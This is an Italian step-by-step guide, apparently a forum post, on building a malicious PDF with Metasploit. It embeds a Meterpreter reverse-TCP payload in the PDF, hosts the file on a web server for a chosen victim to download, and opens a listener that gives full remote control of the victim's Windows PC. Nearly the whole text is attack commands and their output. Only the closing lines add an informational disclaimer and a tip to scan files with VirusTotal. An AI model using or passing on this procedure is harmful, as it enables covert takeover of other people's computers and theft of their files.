In questa guida vedremo come creare un PDF malevolo sfruttando una backdoor creata con Metasploit che ci permetterà di avere il controllo completo dei file del computer della vittima.
Quindi modifichiamo un PDF esistente e lo mettiamo in un nostro sito in modo che potrà essere scaricato da chi vogliamo e si aprirà un listener in modo da avere il controllo totale del PC ormai infetto.
Useremo Adobe Reader come lettore PDF per esaminarlo sulla macchina della vittima, ampiamente utilizzato e gratuito.
I passi saranno:
- Configurazione del payload
- Configurazione degli indirizzi IP
- Creazione del PDF malevolo
- Trasferimento del PDF al server Web
- Apertura del listener Metasploit
- Reverse shell e controllo remoto
Iniziamo avviando Metasploit e cerchiamo degli exploit utili.
root@kali :- # msfconsole -q
[-] Failed to connect to the database: could not connect to server: Connection refused
Is the server running on host "localhost" ( :: 1) and accepting
TCP/IP connections on port 5432?
could not connect to server: Connection refused
Is the server running on host "localhost" (127.0.0.1) and accepting
TCP/IP connections on port 5432?
msf > search type:exploit platform:windows adobe pdf
[!] Module database cache not built yet, using slow search
Con un po' di pazienza dovreste ottenere una lista di exploit:
excellent Adobe PDF Escape EXE Social Engineering (No JavaScript)
exploit/windows/fileformat/adobe_pdf_embedded_exe
excellent Adobe PDF Embedded EXE Social Engineering
exploit/windows/fileformat/adobe_pdf_embedded_exe
Per usarlo:
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
e
info
Ora iniziamo a creare la payload:
msf exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
e show option
A questo punto bisogna configurare un LHOST che sarebbe il vostro IP privato, se non lo sapete aprite un'altra shell e digitate ifconfig
sarà del tipo 192.168.1.X.
Tornate nella shell precedente e settate LHOST:
msf exploit (adobe_pdf_embedded_exe) > set LHOST 192.168.1.X
Se tutto è andato a buon fine per vedere le info aggiornate digitate show options
.
Qui vi verrà scritto che esiste già un file pdf di nome X, per rinominarlo:
msf exploit (adobe_pdf_embedded_exe) > set FILENAME ehf.pdf
Rinominato il file lanciamo il comando exploit e automaticamente verrà creato un payload apposito:
msf exploit (adobe pdf embedded exe) > exploit
Il file PDF vi verrà installato di default su /root/.msf4/local/ehf.pdf
, ora dovremo muoverlo nel nostro server web per permettere l'accesso alla vittima:
msf exploit (adobe_pdf_embedded_exe) > mv /root/.msf4/local/ehf.pdf /var/www/html
Configurandolo di nuovo con le info di prima:
msf exploit (adobe_pdf_embedded_exe) > use exploit/multi/handler
msf exploit (handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.X
Ora lanciamo il comando show options
e vediamo se tutto è stato configurato correttamente, nel mio caso:
Payload options (windows/meterpreter/reverse_tcp):
LHOST 192.168.1.X
LPORT 4444
Se è tutto corretto lanciamo il server web con il comando run
.
Proviamo a fare un po' di controlli, apriamo un altro terminale e assicuriamoci che apache sia in esecuzione:
root@kali : # service apache2 status
Se l'output è positivo siamo pronti ad andare nel nostro server web con il computer della vittima per scaricare il pdf infetto:
Dal browser: http://192.168.1.X/ehf.pdf
e partirà subito il download.
Scaricato il file basterà aprirlo e il danno è fatto. Tornando all'altra macchina nella shell con Metasploit aperto si aggiungerà una sessione:
[*] Meterpreter session 1 opened (192.168.1.X: 4444 -> 192. 168.1.Y:49950) at 2023-11-23 19:59:46
Ora avete il pieno controllo della macchina della vittima compreso fare download di altri file, avviare programmi ecc...
In conclusione un attacco FTP di questo genere era già stato illustrato in questa discussione: Reverse shell su un PC Windows con la Digispark ATtiny85., non una novità ma impostato su uno sfondo molto più succulento.
Sottolineo il fatto che questa guida è stata diffusa solo a scopo informativo e per dimostrare che i virus non sono presenti solo su file dove si vede chiaramente un estensione eseguibile. Consiglio sempre un analisi approfondita del file prima di aprirlo, servizio molto valido e gratuito è Virustotal.